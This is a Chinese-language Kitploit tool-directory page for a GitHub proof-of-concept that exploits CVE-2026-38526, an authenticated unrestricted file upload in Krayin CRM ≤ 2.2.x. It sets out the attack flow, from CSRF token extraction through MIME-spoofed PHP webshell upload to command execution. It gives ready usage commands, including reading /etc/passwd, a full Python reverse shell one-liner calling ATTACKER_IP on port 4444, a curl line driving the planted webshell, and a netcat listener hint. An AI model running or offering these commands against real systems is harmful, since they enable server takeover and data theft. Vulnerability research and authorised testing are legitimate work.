Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
PoC-CVE-2026-38526 — # Krayin CRM ≤ 2.2.x 的自动化漏洞利用工具。 | Kitploit
工具/GitHubGitHub/b0nyo/poc-cve-2026-38526
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队
GitHubb0nyo/poc-cve-2026-38526

PoC-CVE-2026-38526

# Krayin CRM ≤ 2.2.x 的自动化漏洞利用工具。

查看仓库
72个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-38526 - Krayin CRM PHP 上传 RCE

自动利用 Krayin CRM ≤ 2.2.x 的漏洞。此脚本利用 TinyMCE 端点(/admin/tinymce/upload)中的无限制文件上传漏洞,通过伪造 image/jpeg 绕过 MIME 类型验证,上传 PHP webshell,并以 Web 服务器权限执行任意命令。


漏洞详情

属性值
CVE IDCVE-2026-38526
受影响软件Krayin CRM ≤ 2.2.x
漏洞类型无限制文件上传 → 远程代码执行
认证必需(任意有效管理员账户)
端点POST /admin/tinymce/upload

前提条件

  • Python 3.7+
  • 目标 Krayin CRM 实例的有效管理员凭据
  • 对目标应用程序的网络访问
  • requests 库

安装

git clone https://github.com/b0nyo/CVE-2026-38526.git
cd CVE-2026-38526
pip3 install -r requirements.txt

用法

python3 CVE-2026-38526.py -i <TARGET_URL> -u <USERNAME> -p <PASSWORD> [-c <COMMAND>]

参数

标志描述示例
-i目标 URL(带或不带 http://)http://target.com 或 target.com
-u管理员邮箱/用户名[email protected]
-p管理员密码AdminPassword123!
-c要执行的命令(默认:id)whoami

示例

# Basic check
python3 CVE-2026-38526.py -i http://target.com -u [email protected] -p "AdminPassword123!"

# Custom command
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "cat /etc/passwd"

# Reverse shell
python3 CVE-2026-38526.py -i target.com -u [email protected] -p "AdminPassword123!" -c "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ATTACKER_IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])'"

利用流程

  1. 身份验证:从登录页面提取 CSRF 令牌,并使用提供的凭据进行身份验证
  2. 会话验证:从已认证的仪表板中提取新的 CSRF 令牌
  3. Webshell 上传:使用伪造的 MIME 类型将 PHP 载荷上传至 /admin/tinymce/upload
  4. 命令执行:通过 webshell 的 GET 参数执行任意命令

输出示例

[*] Target: http://target.com
[*] Username: [email protected]

[*] Authenticating...
[+] Authentication successful

[*] Uploading webshell...
[+] Webshell uploaded: http://target.com/storage/tinymce/abc123def456.php
[+] CVE-2026-38526 CONFIRMED - Remote Code Execution

[*] Executing: id
[*] Output:
────────────────────────────────────────────────────────────────────
uid=33(www-data) gid=33(www-data) groups=33(www-data)
────────────────────────────────────────────────────────────────────

[*] Manual execution (curl):
curl 'http://target.com/storage/tinymce/abc123def456.php?cmd=id'

常见问题

身份验证失败:请确认凭据正确且目标上存在该账户。

CSRF 令牌提取失败:请确保目标运行的是存在漏洞的 Krayin CRM,且登录端点可访问。

反向 Shell 无法连接:请确保您的监听器正在运行(nc -lvnp <PORT>),防火墙规则允许出站连接,并且载荷中的 IP/端口正确。


免责声明

本工具仅用于经授权的安全测试和教育目的。未经授权访问计算机系统属于违法行为。用户全权负责确保在测试任何目标系统之前已获得适当授权。作者不对因使用本工具造成的滥用或损害承担任何责任。


参考资料

  • TREXNEGRO 安全公告 - CVE-2026-38526
  • Krayin CRM GitHub
  • OWASP - 无限制文件上传

作者

b0nyo - PoC 实现

  • GitHub

TREXNEGRO - 漏洞发现

  • 安全公告
下载工具